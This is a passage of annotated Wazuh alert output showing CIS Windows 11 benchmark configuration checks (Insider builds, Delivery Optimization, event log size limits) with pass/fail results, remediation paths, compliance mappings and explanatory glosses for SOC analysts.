data.sca.check.description:  This policy setting determines whether users can access the Insider build controls in the Advanced Options for Windows Update. These controls are located under "Get Insider builds," and enable users to make their devices available for downloading and installing Windows preview software. The recommended state for this setting is: Disabled. Note: This policy setting applies only to devices running Windows 10 Pro or Windows 10 Enterprise, up until Release 1703. For Release 1709 or newer, Microsoft encourages using the Manage preview builds setting (recommendation title ‘Manage preview builds’). We have kept this setting in the benchmark to ensure that any older builds of Windows 10 in the environment are still enforced.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  It can be risky for experimental features to be allowed in an enterprise managed environment because this can introduce bugs and security holes into systems, making it easier for an attacker to gain access. It is generally preferred to only use production-ready builds.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Data Collection and Preview Builds\Toggle user control over Insider builds. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template AllowBuildPreview.admx/adml that is included with the Microsoft Windows 10 RTM (Release 1507) Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.17.8
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  2.5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.pci_dss:  4.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.hipaa:  164.312.a.2.IV,164.312.e.1,164.312.e.2.I,164.312.e.2.II
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.nist_800_53:  SC.8
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.tsc:  CC6.1,CC6.7,CC7.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\PreviewBuilds']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Download Mode' is NOT set to 'Enabled: Internet'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Download Mode' is NOT set to 'Enabled: Internet'.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:50:09.833+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.833+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Download Mode' is NOT set to 'Enabled: Internet'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19009
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '6.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1', 'SI.2', 'SA.11', 'SI.4']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'A1.2', 'CC6.8']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.18.1']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['7.3']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gpg_13:  ['4.3']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr_IV:  ['35.7.d']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2557475
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26302
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Download Mode' is NOT set to 'Enabled: Internet'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting specifies the download method that Delivery Optimization can use in downloads of Windows Updates, Apps and App updates. The following methods are supported: - 0 = HTTP only, no peering. - 1 = HTTP blended with peering behind the same NAT. - 2 = HTTP blended with peering across a private group. Peering occurs on devices in the same Active Directory Site (if exist) or the same domain by default. When this option is selected, peering will cross NATs. To create a custom group use Group ID in combination with Mode 2. - 3 = HTTP blended with Internet Peering. - 99 = Simple download mode with no peering. Delivery Optimization downloads using HTTP only and does not attempt to contact the Delivery Optimization cloud services. - 100 = Bypass mode. Do not use Delivery Optimization and use BITS instead. The recommended state for this setting is any value EXCEPT: Enabled: Internet (3). Note: The default on all SKUs other than Enterprise, Enterprise LTSB or Education is Enabled: Internet (3), so on other SKUs, be sure to set this to a different value.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Due to privacy concerns and security risks, updates should only be downloaded directly from Microsoft, or from a trusted machine on the internal network that received its updates from a trusted source and approved by the network administrator.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to any value other than Enabled: Internet (3): Computer Configuration\Policies\Administrative Templates\Windows Components\Delivery Optimization\Download Mode. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template DeliveryOptimization.admx/adml that is included with the Microsoft Windows 10 RTM (Release 1507) Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.18.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  7.3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.pci_dss:  6.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.nist_800_53:  SI.2,SA.11,SI.4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.gpg_13:  4.3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.gdpr_IV:  35.7.d
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.hipaa:  164.312.b
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.tsc:  A1.2,CC6.8
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\DeliveryOptimization']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  not applicable
PASS or FAIL. Red = needs fixing.

data.sca.check.reason:  Unable to read registry 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\DeliveryOptimization' (The system cannot find the file specified. )
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Security: Control Event Log behavior when the log file reaches its maximum size' is set to 'Disabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Security: Control Event Log behavior when the log file reaches its maximum size' is set to 'Disabled'.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:50:09.880+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.880+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Security: Control Event Log behavior when the log file reaches its maximum size' is set to 'Disabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19008
Numeric ID of the detection rule that fired.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.1', 'CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.27.2.1']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['8.3']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gpg13:  ['4.12']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr_IV:  ['35.7.d']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2563077
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26305
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Security: Control Event Log behavior when the log file reaches its maximum size' is set to 'Disabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting controls Event Log behavior when the log file reaches its maximum size. The recommended state for this setting is: Disabled. Note: Old events may or may not be retained according to the Backup log automatically when full policy setting.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  If new events are not recorded it may be difficult or impossible to determine the root cause of system problems or the unauthorized activities of malicious users.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Event Log Service\Security\Control Event Log behavior when the log file reaches its maximum size. Note: This Group Policy path is provided by the Group Policy template EventLog.admx/adml that is included with all versions of the Microsoft Windows Administrative Templates. Note #2: In older Microsoft Windows Administrative Templates, this setting was initially named Retain old events, but it was renamed starting with the Windows 8.0 & Server 2012 (non-R2) Administrative Templates.
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.27.2.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  8.3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.pci_dss:  10.6.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.nist_800_53:  AU.6
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.gpg13:  4.12
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.gdpr_IV:  35.7.d
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.hipaa:  164.312.b
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.tsc:  CC6.1,CC6.8,CC7.2,CC7.3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\EventLog\\Security']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  passed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Security: Specify the maximum log file size (KB)' is set to 'Enabled: 196,608 or greater'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Security: Specify the maximum log file size (KB)' is set to 'Enabled: 196,608 or greater'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.895+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.895+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Security: Specify the maximum log file size (KB)' is set to 'Enabled: 196,608 or greater'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  23
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.1', 'CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.27.2.2']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['8.3']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gpg13:  ['4.12']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr_IV:  ['35.7.d']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2567241
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26306
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Security: Specify the maximum log file size (KB)' is set to 'Enabled: 196,608 or greater'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting specifies the maximum size of the log file in kilobytes. The maximum log file size can be configured between 1 megabyte (1,024 kilobytes) and 4 terabytes (4,194,240 kilobytes) in kilobyte increments. The recommended state for this setting is: Enabled: 196,608 or greater.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  If events are not recorded it may be difficult or impossible to determine the root cause of system problems or the unauthorized activities of malicious users.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: 196,608 or greater: Computer Configuration\Policies\Administrative Templates\Windows Components\Event Log Service\Security\Specify the maximum log file size (KB). Note: This Group Policy path is provided by the Group Policy template EventLog.admx/adml that is included with all versions of the Microsoft Windows Administrative Templates. Note #2: In older Microsoft Windows Administrative Templates, this setting was initially named Maximum Log Size (KB), but it was renamed starting with the Windows 8.0 & Server 2012 (non-R2) Administrative Templates.
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.27.2.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  8.3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.pci_dss:  10.6.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.nist_800_53:  AU.6
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.gpg13:  4.12
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.gdpr_IV:  35.7.d
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.hipaa:  164.312.b
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.tsc:  CC6.1,CC6.8,CC7.2,CC7.3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\EventLog\\Security']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Setup: Specify the maximum log file size (KB)' is set to 'Enabled: 32,768 or greater'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Setup: Specify the maximum log file size (KB)' is set to 'Enabled: 32,768 or greater'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.927+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.927+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Setup: Specify the maximum log file size (KB)' is set to 'Enabled: 32,768 or greater'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  24
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.1', 'CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.27.3.2']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['8.3']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gpg13:  ['4.12']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr_IV:  ['35.7.d']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2571429
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26308
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Setup: Specify the maximum log file size (KB)' is set to 'Enabled: 32,768 or greater'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting specifies the maximum size of the log file in kilobytes. The maximum log file size can be configured between 1 megabyte (1,024 kilobytes) and 4 terabytes (4,194,240 kilobytes) in kilobyte increments. The recommended state for this setting is: Enabled: 32,768 or greater.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  If events are not recorded it may be difficult or impossible to determine the root cause of system problems or the unauthorized activities of malicious users
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: 32,768 or greater: Computer Configuration\Policies\Administrative Templates\Windows Components\Event Log Service\Setup\Specify the maximum log file size (KB). Note: This Group Policy path is provided by the Group Policy template EventLog.admx/adml that is included with all versions of the Microsoft Windows Administrative Templates. Note #2: In older Microsoft Windows Administrative Templates, this setting was initially named Maximum Log Size (KB), but it was renamed starting with the Windows 8.0 & Server 2012 (non-R2) Administrative Templates.
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.27.3.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  8.3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.pci_dss:  10.6.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.nist_800_53:  AU.6
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.gpg13:  4.12
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.gdpr_IV:  35.7.d
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.hipaa:  164.312.b
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.tsc:  CC6.1,CC6.8,CC7.2,CC7.3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\EventLog\\Setup']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'System: Control Event Log behavior when the log file reaches its maximum size' is set to 'Disabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'System: Control Event Log behavior when the log file reaches its maximum size' is set to 'Disabled'.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:50:09.943+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.943+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'System: Control Event Log behavior when the log file reaches its maximum size' is set to 'Disabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19008
Numeric ID of the detection rule that fired.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.1', 'CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.27.4.1']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['8.3']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gpg13:  ['4.12']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr_IV:  ['35.7.d']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2575577
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26309
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'System: Control Event Log behavior when the log file reaches its maximum size' is set to 'Disabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting controls Event Log behavior when the log file reaches its maximum size. The recommended state for this setting is: Disabled. Note: Old events may or may not be retained according to the Backup log automatically when full policy setting.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  If new events are not recorded it may be difficult or impossible to determine the root cause of system problems or the unauthorized activities of malicious users.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Event Log Service\System\Control Event Log behavior when the log file reaches its maximum size. Note: This Group Policy path is provided by the Group Policy template EventLog.admx/adml that is included with all versions of the Microsoft Windows Administrative Templates. Note #2: In older Microsoft Windows Administrative Templates, this setting was initially named Retain old events, but it was renamed starting with the Windows 8.0 & Server 2012 (non-R2) Administrative Templates.
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.27.4.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  8.3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.pci_dss:  10.6.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.nist_800_53:  AU.6
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.gpg13:  4.12
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.gdpr_IV:  35.7.d
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.hipaa:  164.312.b
